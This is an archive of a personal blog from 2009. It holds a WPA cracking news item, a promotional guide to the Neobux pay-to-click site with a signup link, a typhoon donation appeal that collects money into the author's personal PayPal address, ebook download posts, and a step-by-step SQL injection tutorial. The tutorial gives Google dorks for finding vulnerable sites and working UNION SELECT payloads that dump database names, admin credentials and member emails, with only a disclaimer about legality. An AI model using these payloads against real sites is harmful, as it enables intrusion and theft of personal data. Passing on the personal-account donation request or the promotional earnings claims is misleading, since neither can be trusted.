Sunday, September 13, 2009

WPA encryption hacked in under a minute!

Computer scientists in Japan say they've developed a way to break the WPA encryption system used in wireless routers in about one minute.

The attack gives hackers a way to read encrypted traffic sent between computers and certain types of routers that use the WPA (Wi-Fi Protected Access) encryption system. The attack was developed by Toshihiro Ohigashi of Hiroshima University and Masakatu Morii of Kobe University, who plan to discuss further details at a technical conference set for Sept. 25 in Hiroshima. Last November, security researchers first showed how WPA could be broken, but the Japanese researchers have taken the attack to a new level, according to Dragos Ruiu, organizer of the PacSec security conference where the first WPA hack was demonstrated. "They took this stuff which was fairly theoretical and they've made it much more practical," he said.

The Japanese researchers discuss their attack in a paper presented at the Joint Workshop on Information Security, held in Kaohsiung, Taiwan earlier this month.
The earlier attack, developed by researchers Martin Beck and Erik Tews, worked on a smaller range of WPA devices and took between 12 and 15 minutes to work. Both attacks work only on WPA systems that use the Temporal Key Integrity Protocol (TKIP) algorithm. They do not work on newer WPA 2 devices or on WPA systems that use the stronger Advanced Encryption Standard (AES) algorithm.

The encryption systems used by wireless routers have a long history of security problems. The Wired Equivalent Privacy (WEP) system, introduced in 1997, was cracked just a few years later and is now considered to be completely insecure by security experts. WPA with TKIP "was developed as kind of an interim encryption method as Wi-Fi security was evolving several years ago," said Kelly Davis-Felner, marketing director with the Wi-Fi Alliance, the industry group that certifies Wi-Fi devices. People should now use WPA 2, she said. Wi-Fi-certified products have had to support WPA 2 since March 2006. "There's certainly a decent amount of WPA with TKIP out in the installed base today, but a better alternative has been out for a long time," Davis-Felner said.

Enterprise Wi-Fi networks typically include security software that would detect the type of man-in-the-middle attack described by the Japanese researchers, said Robert Graham, CEO of Errata Security. But the development of the first really practical attack against WPA should give people a reason to dump WPA with TKIP, he said. "It's not as bad as WEP, but it's also certainly bad."
Users can change from TKIP to AES encryption using the administrative interface on many WPA routers.

Labels: , , , , , ,

Thursday, September 10, 2009

Neobux-The best PTC site on the internet. By for3v3rforgott3n


Contents At A Glance:

Introduction

What exactly does that mean?

What is a PTC website?

Okay, I understand. Please give me more information about Neobux.

Only 4 advertisements/4 cents a day?! No way I'm joining!

How much does it cost to rent referrals?

Can I lose money? How do I ensure I stay in profit?

Memberships

Are you sure Neobux isn't a scam? Can you give me tips on how to tell if a PTC site is a scam?

What other great features does Neobux have that I should know about?

End Notes

Introduction

Today I will introduce you to one of the best Pay to Click websites on the internet, Neobux.

Neobux is a innovative PTC website that has already paid $11.5 million to their members (at the time of this post). For the current total payout amount, refer to the image below.



What exactly does that mean?

Well , it indicates that Neobux is in fact, NOT a scam. They will not use you to click their advertisements, make money out of it, and not pay you like many of the PTC scams we see around today.

What is a PTC website?

You may be wondering what a PTC website is? Let's start from the literal meaning. PTC is an acronym for Pay to Click, PTC websites allow advertisers to post their ads for a certain price (the price usually depends on the number of "views" or "impressions" the advertiser desires) and they give YOU, the user, a portion of the payment. Payments are usually around 1 cent per "impression" (everytime you view an ad, you are giving it one "impression"), some sites may pay more or less but it's generally around 1 cent. The best part? Neobux is absolutely FREE to join. However, make sure you sign up for a Paypal, Alertpay, or Neteller account before you signup as your payment info is required upon registration.

Okay, I understand. Please give me more information about Neobux.

As a standard member (meaning you have not paid to upgrade your membership), you are given 4 advertisements every 24 hours (the time depends on when you first click your ads), and you are paid 1 cent or $0.01 for each advertisement you view. To be credited or paid to view an advertisement, you must click the ad on your "View Advertisements" page, click the red dot that shows up, and wait until the timer finishes and it says "$x has been credited to your account" near the top of the page. After you see this message, you can close the window and go click another advertisement.

Only 4 advertisements/4 cents a day?! No way I'm joining!

If that's what you're thinking right now, don't fret. Like I said in the beginning of this post, Neobux is an INNOVATIVE PTC website. Everyone is aware that 4 cents a day won't be enough for ANYONE to live off of. This is why Neobux gives you extra ads a few times a day, at random times, and for a random amount of time. There are 3 possible types of ads that will show, the "normal" ads which you click 4 times a day (also worth $0.01), "extended exposure" ads which display for slightly longer (worth $0.015), and "mini exposure" ads which display for slightly shorter (worth $0.005). If you refresh the Neobux website a few times a day, you could easily get around 6 cents per day. Still not enough? This is where the big earnings come in. Neobux is the first PTC site to ever introduce referral renting. What does this mean? It's like having people sign up under you, but instead, you rent existing members of Neobux for a certain amount of money. Depending on your membership, a certain amount will be credited to you everytime your referrals click an advertisement (for standard members, you gain 0.5 cents for every click your referrals make).

How much does it cost to rent referrals?

As a new member, Neobux gives you a discount for the first 2 rentals. For renting 3 referrals, you only have to pay $0.75 or 75 cents for a 30 day rental. After the first 2 rentals however, it's 84 cents for 3 referrals. Usually the referrals will be standard members as the ratio between Standard to Golden (or higher) is over 2:1. What does this mean? It means for every member paying for a membership, there will at LEAST be 2 standard members. However, if you're lucky enough to get a Golden member as your rented referral, you will be making more money. Why? It's simple. Golden (or higher) members get 9 advertisements a day (which means if they click everyday, you will be gaining a minimum of 0.005*9*30=$1.35 extra ads excluded). You may be thinking, "wow, they can pay for almost twice of my 30 day rental?" Yes, you can easily be in profit by just getting one Golden member. However, since the Standard to Golden ratio is so high, it won't be that easy to get a golden member as your referral.

Can I lose money? How do I ensure I stay in profit?

The answer is simple, you won't lose money if you don't put any money into Neobux to speed up the process. Since the money wasn't yours to start with, you will NEVER be losing money if you don't invest. However, you and I both know that you joined to make money right? In that case, I will share some simple tips with you to more or less ensure profit. Do NOT rent your first 3 referrals the instant you get $0.75 cents. Why not? Let's say you rented your 3 referrals and now you have $0.00 in your Neobux main balance. If any of your referrals stop clicking for too long, you WILL be able to recycle them for another one for $0.08 because you will have clicked more ads during the time they haven't clicked. However, you may not be able to renew the good clickers by the time your 30 days is up because you've spent too much. This means that you will have to risk losing money during your NEXT rental because all of your referrals are new and therefore, could be inactive members. In other words, DO NOT drain all your money in your balance if you're going to rent referrals. Make some calculations and make sure you will have enough for any adjustments before you rent. This also applies to cashing out money to your Paypal, Alertpay, or Neteller.

Also, there is a number on the far right side of each referral in your referral list (look under AVG). This number will assist you in determining when to recycle an inactive referral and in turn, maximize your profits and minimize expenses. Refer to the length of inactivity and the corresponding averages to determine whether or not to recycle.

Recycle ALL referrals that haven't clicked:

1) For 3-4 days with an Average less than 1
2) For 5-6 days with an Average less than 1.2
3) For 7 or more days with an Average less than 2

Memberships

Neobux offers many different types of memberships. However, I will not be going into detail about them as more information about memberships can be found HERE
Basically, memberships are split into 4 main types (one which you is no longer available to new members), and a couple "transitions" in between.

There is Standard, Pioneer, Golden and Ultimate.

Pioneer is a lifetime membership Neobux provided their members during the opening to thank them. Pioneer members have some discounts and slight advantages that Standard members don't have, but it's not too big of a difference.

Golden memberships are basically a BIG upgrade from Standard as every advertisement your referral views gives you 1 cent instead of the 0.5 cents Standard members get. Golden membership costs $90 per year (or 365 days).

Ultimate costs $890 (yea I know, wow...), gives you 15 advertisements a day and has many great features, and since almost everyone who has the money wants to upgrade to Ultimate, you can guess it's pretty much worth it. For more information on Neobux memberships, please refer to the link at the top of this section.

Are you sure Neobux isn't a scam? Can you give me tips on how to tell if a PTC site is a scam?

Yes, Neobux is NOT a scam. If you refer to the image provided near the top, it'll show you how much they've already paid to their members and if you do a simple google search on them, you'll see many testimonies and payment proofs. Now onto recognizing scam PTC sites that you most likely shouldn't waste your time on. First of all, if the website does not have a forum, it most likely is a scam. If a PTC site does not have a forum for members to post and interact with each other, it's most likely that they DON'T want members to interact, which suggests that they are a scam because members would stay unaware of any fellow members being scammed and not paid by the website. Another great way to determine whether a site is worth your time is doing a Google search. If you see a few testimonies, don't be assured. Staff and friends of the website can pull that off easily. However, if you see countless proof of payments, testimonies, and tutorials, it's most likely that the website is legitimate and will pay you. The main reason for this is simple, I'm sure you can guess the main reason for people writing tutorials and/or guides such as this one. It's to help any new members that may need assistance getting familiar with a new environment (in our case, Neobux.) and to not make any stupid or overlooked mistakes that people may have made during their membership. However, if a PTC site is not legitimate, it's unlikely that you will find many tutorials on it because writing tutorials takes time and most of us unfortunately, DON'T get paid for it. Please note that the tips I've provided you are not guaranteed to identify PTC scam sites, but are highly effective nonetheless.

What other great features does Neobux have that I should know about?

One great feature I haven't gotten around to mentioning is that Neobux has an instant payout system! What does that mean? It means exactly what it sounds like! Any money that you request to transfer from your Neobux main balance will be transferred into your Paypal, Alertpay, or Neteller account within a few minutes. This is different from many websites that need to take a few weeks to approve of your request then another few weeks to get the money to you, when you request payout from Neobux, you can use the money elsewhere almost instantly! I'm sure you'll be as thankful as I am for this great feature.

End Notes

Well, this is finally the end of my post. I hope you found it informative and helpful. If you have any questions please feel free to post a comment or contact me. If you would like to sign up to this great PTC site, here's the signup link: Register, and I hope you all have a great day!



© -§for3v3rforgott3n§-

for3v3rforgott3n's forum signature

Labels: , , , , , , ,

Sunday, August 23, 2009

Typhoon Morakot-Extend your love, show you care.

 As many of you may have already heard, recently Taiwan was hit by a typhoon called Morakot. The event is named as the deadliest typhoon to EVER affect Taiwan. A large number of people are either dead or missing, and the estimated damage caused is around NT$110 billion ($3.3 billion USD). Many children/families are left homeless, foodless, and are unable to further extend their education. A quick look at the image below may give you an idea on how devastating this typhoon really is.


Here you can clearly see Typhoon Morakot covering more than all of Taiwan.

Many residents are still trapped on the mountains in Taiwan, waiting to be discovered, and starving to death.  Not only has this typhoon caused massive floods of water, the great amount of mountains have also been affected greatly by disastrous mud/landslides. Villages on the mountains have been either completely depleted or buried. The families and communities torn apart by this merciless typhoon are still franticly searching for the bodies of their lost ones whether dead or alive, and mourning in complete misery. The Taiwanese people have been doing all they can in providing food, water, and money to the areas affected most by the disaster. This however, is clearly not enough.  The efforts they've been able to contribute to the overall need in financial support is pretty much futile. This is where we come in. We can help them reconstruct their society by giving what we can. It doesn't matter how much you donate, whether it be 5 dollars or 5000 dollars, it's the willingness to help a society in need that counts.

Why help?

 If you're one of those selfish people who always don't care about anyone in need because it doesn't affect you directly, consider this. Everyday, our planet is being damaged by all the pollution and substances we put into the environment around us. Natural disasters like typhoons, hurricanes, are only going to increase. Not only will more and more disasters are going to take place, they WILL get worse. If you're unwilling to help out someone that needs help right now, they may not be there to help YOU when you need it. So please, find it in your hearts to contribute to a society in need.

How can I help?


 First of all, it doesn't matter what religion you believe in, pray that the Taiwanese people will get the support they need and people like you and me will find it in our hearts to provide the help we're able to provide.

 You can also contribute financially (which is really what they need most right now). I have setup a Paypal account just for donating for places affected greatly by natural causes (yes, I plan to continue to donate to places in great need and continue to include them on my blog), and you can help the Taiwanese who are currently suffering from the Typhoon Morakot of August 8th 2009. 100% of the money sent to this account will be donated to either World Vision or Red Cross or any other major organization supporting this cause. All payment proofs will be provided upon request to ensure authenticity.

Please send your payments to lastlegacystaff@hotmail.com (via Paypal, if you are willing to go through the trouble, you can make payments directly to the corresponding organizations in Taiwan). All payment proofs can also be requested at the same email address. Please note: All Paypal fees do apply (Paypal deducts a small percentage during a transaction, so the final amount may be slightly lower than the intended total)
For more information on the Morakot Typhoon, you can visit the following Wikipedia article:
http://en.wikipedia.org/wiki/Typhoon_Morakot_(2009)

If anyone was wondering, I've already donated NT $100,000 before Paypal deductions (around $3,333 or so CAD) to World Vision for this cause. 
Extend your love, show you care!



Labels: , , , ,

Saturday, August 8, 2009

SQL injection tutorial

Contents At A Glance:

Introduction

Finding Vulnerable Sites

Getting Number of Columns

Getting MySQL Version

Getting Database Names

Getting Database User

Getting Table Names

Getting Column Names

LIMIT, What is it and why do I need to know how to use it?

End Notes

Introduction

First of all, if you find that I have written something that is wrong, please address it and I will fix it. I have written this tutorial solely for education purposes, do not contact me regarding anything along the lines of me publishing "full disclosure" information on internet security. I have written this in the hopes that it will not only help educate anyone who is interested in SQL injection, it may also help educate any website owners/coders who are unaware of the risks that they put their company/systems in when leaving a simple issue unattended. This tutorial was written by for3v3rforgott3n at http://for3v3rforgott3n.blogspot.com

Finding Vulnerable Sites

First you need to know what makes a site vulnerable to SQL injection before you can find and inject vulnerable sites.

The most common reason that a site is vulnerable to SQL injection attacks in because the owner/coder didn't use the built in MySQL feature 'mysql_real_escape_string()'. The purpose of this function is to sanitize or remove special characters from an SQL query. The most common side-effect is the simple username/password exploit ' or '1'='1. Most website administrators today use this function along with stripslashes() or addslashes() to further sanitize the data.

Well since I gave you a very basic reason for why certain sites are vulnerable, we will move on to finding some vulnerable sites to play with.

When talking about finding sites to inject you will hear the term “dork” a lot, what this refers to is a google search term targeted at finding vulnerable websites. A “google dork” uses the built in google functions inurl:, or allinurl: to search for websites that have certain strings in their URL or website address, an example of a google dork is: inurl:index.php?id=1, entering this string into the google search engine would return all of the sites in google's cache with the string index.php?id=1 in their URL, Ex: http://www.example.com/index.php?id=1

Here is a list of “dorks” to use:

http://sql-injection-tools.blogspot.com/2009/06/dork-sqli-by-shafiq.html

Now that we know what a google dork is we can start finding vulnerable sites. To be vulnerable the site has to have a GET parameter in the URL: index.php?id=1, id=1 being the GET parameter which 'gets' the 1 'id' from the SQL database(Understand? Good.)

So you are going to go to http://www.google.com,http://www.blackle.com, or http://www.dogpile.com and search for your selected dork. When you get your list you can start checking for vulnerabilities. To do this the most common way is to add a back-tick after one of the integers in the URL

Example: http://www.example.com/index.php?id=1'

Now there are many ways for a site to show you that it is vulnerable the most common are errors:

You have an error in your SQL SyntaxWarning: mysql_fetch_array():Warning: mysql_fetch_assoc():Warning: mysql_numrows():Warning: mysql_num_rows():Warning: mysql_result():Warning: mysql_preg_match():



If you receive any of these errors when you enter the ' after the number then chances are the site is vulnerable to SQL injection attacks to some extent, but that isn't the only way to see if a site is vulnerable, the biggest overlooked error is when a main part of the site just simply disappears, such as a news article or a body of text on the main site. If this happens then it is likely that the site is vulnerable also.

Getting Number of Columns

After you find your vulnerable site the first step you need to take is to find the number of columns in the table that is in use. There are a couple of ways that people do this, personally I use the ORDER BY statement, there is also GROUP BY which accomplishes the same thing, but it's just habit. A lot of people use the string +and+1=0+ before their queries, most of the time it is just a waste of time to type this out, the only time you need this is if you try ORDER BY 300-- and you don't receive an error, then you would add the and 1=0 to your query.
To find number of columns you start with ORDER BY 1, if it doesn't error then you are good to go, sometimes you will get a syntax error when doing ORDER BY 1 that's why it is important to start there, if you get the syntax error your best bet is to move on to another site. If you don't get an error I always go to ORDER BY 300 or more to see if I will get an error there, sometimes you could go on for years and never get an error, there can't be 300 or more columns in the database so you should always get an error. After getting the error on 300 it is up to you how you want to find the number of columns, personally I jump around out of habit I usually do something like this:

http://www.example.com/index.php?id=1 ORDER BY 1--

no error

http://www.example.com/index.php?id=1 ORDER BY 300--

error

http://www.example.com/index.php?id=1 ORDER BY 10--

error

http://www.example.com/index.php?id=1 ORDER BY 5--

no error

http://www.example.com/index.php?id=1 ORDER BY 6--

error

After this you know that your website has 5 columns because it errors on everything above ORDER BY 5, and doesn't error on anything below ORDER BY 5.

Note on comments: Comments are not always necessary when injecting a website, although sometimes they are, by comments I am referring to the -- at the end of the URL.

Possible comments to use are --, /*, /**/, or simply nothing at the end.

Getting MySQL Version

Now that we have the number of columns you are going to want to get the version of the database you are working on, this is an important step, because any version lower than 5 you will have to guess table names and column names. I don't recommend working on a database lower than version 5 for beginners, you should get acquainted with SQL injection first. Before we can get the version you have to find a visible column number. This is where the injection part really starts. To do this you will use a SELECT statement and the UNION statement. Most people don't understand that these are two completely different SQL statements, the reason you use UNION SELECT is because you are already SELECTing from the database when you are simply visiting the site.

For example: http://www.example.com/index.php?id=1

What this URL is telling the database is SELECT * FROM 'tablenamehere' WHERE id='1';

Now when we add UNION into that URL we are adding two SQL statements together. Since our example website has 5 columns this is what our query would look like:

http://www.example.com/index.php?id=1+UNION+SELECT+1,2,3,4,5--

The website should return normal after doing this, if it doesn't and it tells you something like “Forbidden” or some other error, then the website doesn't support union statements and you need to move on. If it doesn't error then add a negative sign after the equal sign like this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5--

There is a reason for this, I've been asked many times why you do this, the reason is when you send this query to the database you are sending something like:
SELECT * FROM 'tablenamehere' WHERE id='-1' AND SELECT 1,2,3,4,5

There isn't a -1 in the id column so the database will return a blank section of the page, but since we have our other SELECT statement in there it will return numbers back in the data's place (so in short, the negative sign pretty much cleans out the content that isn't valuable to us). Those are our visible columns. For our example we'll say we got back the numbers 2 and 3 so these are the numbers that we can retrieve data from. To get our database version there are two ways, either @@version or version(). To use them do this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,@@version,3,4,5--

or

http://www.example.com/index.php?id=-1+UNION+SELECT+1,concat(version()),3,4,5--

If you get an error like “Illegal mix of coallations" when using @@version you simply have to convert it to latin from UTF8 like so:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--

NOTE: Notice that we completely replace the number 2 with our query, something like union select 1,concat(version()),2,3,4,5-- will not work.
If it worked you now know the version of the MySQL database in use. You will see something like 5.0.13-log, or 4.0.0.1-delta, there are countless versions and types but all we need to focus on is the first number if it 5 or higher then we are good to go, if it is 4 or lower, it is recommended for you to move on if you're new to SQL injection.

Getting Database Names

I haven't seen this covered on any papers on SQL injection so I will include it because it is an important part of SQL Injection. For novice SQL injectors ever started to inject a website then find no useful data such as usernames/passwords? Most likely because the current database in use for the site only holds data like news articles and the like. This is where getting the different database names is important. In versions of MySQL higher than 5 there will always be a database named 'information_schema' and most of the time a database named 'test', neither of these hold data that you will need to know, but yet the information_schema database is the reason that injection v5+ databases is so easy.

To get the list of databases do this:

http://www.example.com/index.php?id=-1+union+select+1,group_concat(schema_name),3,4,5+ from+information_schema.schemata--
Now where you saw the database version pop up earlier you will see the names of all of the different databases we will say for our example we got back something like this:

information_schema,exampledb,exampledb2,test

If you want to know what the database in use right now is, do this:

http://www.example.com/index.php?id=-1+union+select+1,concat(database()),3,4,5--

We'll say we got back 'exampledb'.

From now on it is a good idea to have a text editor open like notepad/gEdit to save this information for later use. I always have notepad open when I am injecting a site, with a template like this:

Databases:

Tables:

Columns:

So that I can quickly copy and paste the information in. In my opinion this is a good habit to get into.

Getting Database User

Not really necessary but good to know. Use user():

http://www.example.com/index.php?id=-1+union+select+1,concat(user()),3,4,5--

Getting Table Names

I'm going to go a little more in-depth than most tutorials you'll see on the internet here because they aren't very thorough, most will just tell you how to get the tables of the current database but I am going to show you how to get table names from selected databases.

To get table names from the current database:

http://www.example.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

You will see a list of table names come out, for our example we will say we got:

news, images, ads, links

Wow that looks useful huh? That is information we can get from just looking at the website, so now it's time to get tables from our other database we found earlier, 'exampledb2'. This is where your best friend the hex converter will come in handy. To get tables from selected databases you have to hex the name.

So we convert exampledb2 to 6578616d706c65646232. Always remember to add the 0x in front of the hexed name to tell the database that it is hex encoded and it need to decode it to get the right name. So our database name ends up being 0x6578616d706c65646232.

Online text-to-hex converters:

http://www.motobit.com/util/binary-file-to-sql-hexstring.asp

http://www.string-functions.com/string-hex.aspx

http://home2.paulschou.net/tools/xlate/

Now for the query:

http://www.example.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0x6578616d706c65646232--

Notice we changed 'database()' to our hexed database name ' 0x6578616d706c65646232'

For our example we'll say we got back:

newsletter, members, administrators

That's the good stuff, normally you wouldn't have found this information and just moved onto another site.

Getting Column Names

This is exactly like getting table names, you just change table_name to column_name and information_schema.tables to information_schema.columns:

http://www.example.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

That's gonna give you every column name in the database but you most probably don't want the columns for 'exampledb' because there wasn't any useful info in there. You want just the column names from 'exampledb2' because there was member info and admin info in that database. So now you open your text-to-hex editor again and hex your database again so 'exampledb2' becomes '0x6578616d706c65646232'

http://www.example.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=0x6578616d706c65646232--

That will only return the column names from that selected database. We'll say we got back:

email, username, password, first_name, last_name

If you remember the table names from exampledb2, which you should because you always paste into notepad right? You can get the administrator's username, password, email address, and full name.

To get this you would do:

http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password,0x3a,email,0x3a,first_name,0x3a,last_name)​,3,4,5 from exampledb2.administrators--

3a being the hex value for a colon ':' so that you can easily separate the information. Sometimes this wont work though, sometimes you have to hex the databasename.tablename (not a lot but sometimes) so in that case it would be:

http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5 from 0x6578616d706c656462322e61646d696e6973747261746f7273--

Which will then give you what you're looking for.

LIMIT What is it and why do I need to know how to use it?

Ever found a database that is full of users/emails/anything else that you want but can't get it all because the website just wont display them all in one go? Well, this is where you need the LIMIT statement.

For our example we will say we want the emails from the exampledb2.newsletter table, the only column in that table is 'email', it probably will never be that easy but hey this is an example right? There are 500 emails in this database and when we group_concat(email) from the database we only get back 20 results and 1 half cut-off like random.email@gma so how do we get the rest of the 480 emails? This is where your perseverance will come into play, if you want it that bad you would use the LIMIT statement to get them since we already got the first 20 results we'll start at 21 to get the full email address that is cut off:

http://www.example.com/index.php?id=-1 union select 1,concat(email),3,4,5 from exampledb2.newsletter limit 21,9999999--

Note when using limit: You can't use group_concat() it will error, drop the group and just use concat().

The 999999 can be any number higher than the row count in the database I just use that because I haven't seen a database with that many rows, therefore it would be more than enough to cover all our data. You would do this increasing your first number by 1 until you get an error or just a blank area where the email addresses have been popping up. Ex: limit 22,9999999--,limit 23,9999999--,limit 24,9999999--

Yes, it will take a long time to do this, there are tools used to dump databases though, most commonly used is SQLi Helper, but keep in mind that this tool is flawed too because it won't increase the last number when limiting if needed. You can always code your own program to automate the task for you in php, perl, python, etc. Be creative! =)

End Notes

Well, that's it. I do hope that I helped you. I know it was a long read for those of you that actually went through it all, but I think most of the people who read this will learn something new. On another note, although SQL injection and defacing websites can be fun, but you need to know that it is illegal. Here are some things to keep in mind.

Hacking is covered under law Title 18: Crimes and Criminal Procedure:

Part 1: Crimes: Chapter 47: Fraud and False Statements: Section 1030: Fraud and related activity in connection with computers. The federal punishment for hacking into computers ranges from a fine or imprisonment for no more than one year to a fine and imprisonment for no more than twenty years. This wide range of punishment depends upon the seriousness of the criminal activity and what damage the hacker has done.

The Ten Commandments of Computer Ethics by the Computer Ethics Institute:

1. Thou shalt not use a computer to harm other people.

2. Thou shalt not interfere with other people's computer work.

3. Thou shalt not snoop around in other people's computer files.

4. Thou shalt not use a computer to steal.

5. Thou shalt not use a computer to bear false witness.

6. Thou shalt not copy or use proprietary software for which you have not paid.

7. Thou shalt not use other people's computer resources without authorization or proper compensation.

8. Thou shalt not appropriate other people's intellectual output.

9. Thou shalt think about the social consequences of the program you are writing or the system you are designing.

10. Thou shalt always use a computer in ways that insure consideration and respect for your fellow humans.

If you found this tutorial informative, please leave a comment or send me an email. If you found some errors or have any questions/suggestions, please don't hesitate to comment or send me an email too!

All information contained here serves solely for education purposes, we do not promote or condone illegal acts/activities, all activities resulting from the information disclosed in this tutorial does not involve us in anyway. This tutorial is property of the author for3v3rforgott3n, and is not to be reproduced in any form anywhere without credits and the author's exclusive permission. Links to this site however, are allowed.



© -§for3v3rforgott3n§-

for3v3rforgott3n's forum signature

Labels: , , , , ,

Thursday, July 23, 2009

SQL ebooks-Crucial for learning about SQL injection!

Interested in retrieving personal information and data from websites? Seeking to learn more about internet security? Having problems with hackers defacing your website? Simply interested in broadening your intellectual capabilities and your understanding of the vast world of the internet?

In order to indulge in the act of hacking, you must be able to understand and manipulate security. In order to protect yourself against malicious attacks directed towards you and/or your website, no matter if it's targetted or random, you must understand which lines of code are being used to provide a hacker with unauthorized access. 

How would you go about doing that? Well...you could go spend a couple thousand dollars taking courses, or you can learn it yourself. Do you have the urge to learn but are not willing to pay a couple thousand dollars? Are the tuition times interfering with your full time job? Do you wish to learn in your own free time and whenever you feel like it? Well, here's the deal. I can not only provide you with an alternative that thoroughly teaches you the main foundation of all you need to know, enables you have a flexible schedule, best of all, I can provide it all free of charge.

The link provided below will be more than sufficient in your education in SQL injection, preventing unauthorized access, data sanitization and much more.

There are multiple ebooks on SQL (which stands for Structured Query Language) provided in the download link below. It is in .rar format so please make sure you have WinRAR installed to unrar it. If you don't have WinRAR or don't know what I'm talking about, download it HERE.



Download SQL ebooks


  © 2009 -§for3v3rforgott3n§-


Labels: , , ,

Wednesday, July 15, 2009

Hacking Ubuntu-eBook

Thinking about taking up Linux but aren't sure how to get started? Not sure which distribution based on the linux kernel you should try? Have absolutely no idea what I'm taking about?

Ubuntu is a user-friendly distribution of Linux based on the linux kernel. As are all other Linux distributions, Ubuntu is highly customizable and can be modified to personal taste/preference. Not only is it highly customizable, it also provides better security than the Windows operating system. What's the best thing about Ubuntu? Well...it's completely free of charge and is guaranteed to stay free of charge.

How do you go about getting Ubuntu? It is available for download on the Ubuntu website at www.ubuntu.com. You can also order it (sent to you free of charge).

For more information about this great distribution of Linux, please visit http://www.ubuntu.com/products/whatisubuntu.

NOW...is this post merely an advertisement for you to take up Linux? No. I am here to provide you all an ebook on Ubuntu (for free...yea I know why do I do this?) directed towards starters which touches on the basics. Although the name "Hacking Ubuntu" may sound professional, after you're done reading, you WON'T be able to hack. The title is merely to capture the reader's attention. Okay, enough about the book, let's get the real deal. Provided below is the link to the ebook, it is in .rar format so please make sure you have WinRAR installed to unrar it. If you don't have WinRAR or don't know what I'm talking about, download it HERE.


Hacking Ubuntu-eBook Download


  © 2009 -§for3v3rforgott3n§-

Labels: , ,

Thursday, July 2, 2009

Deviant Art

Please visit for3v3rforgott3n's main site at http://for3v3rforgott3n.info.tm! We hope you enjoy your stay :)







Our main site http://for3v3rforgott3n.info.tm has been successfully nominated and awarded the Design Award by CoolHomePages.com



Deviant Art-Deviousness Award


I have also had the honour of being presented with the "The Deviousness Award" on Dec/01/2008 by Deviant Art



For those of you that may not be quite familiar with Deviant Art,
"The Deviousness Award is an accolade which is traditionally handed out on the 1st of every month to one truly outstanding deviant.

We are delighted to award the final Deviousness Award of 2008 to for3v3rforgott3n" (Quote from Deviant Art)



  © 2009 -§for3v3rforgott3n§-

Labels:

My proxies!

Please visit http://for3v3rforgott3n.info.tm/proxy for a great, working proxy!
The same proxy is also available at http://bcmath.us.to.

A faster proxy (different scripting) with arguably a nicer index page is now done and is available at http://bcmath2.us.to.


  © 2009 -§for3v3rforgott3n§-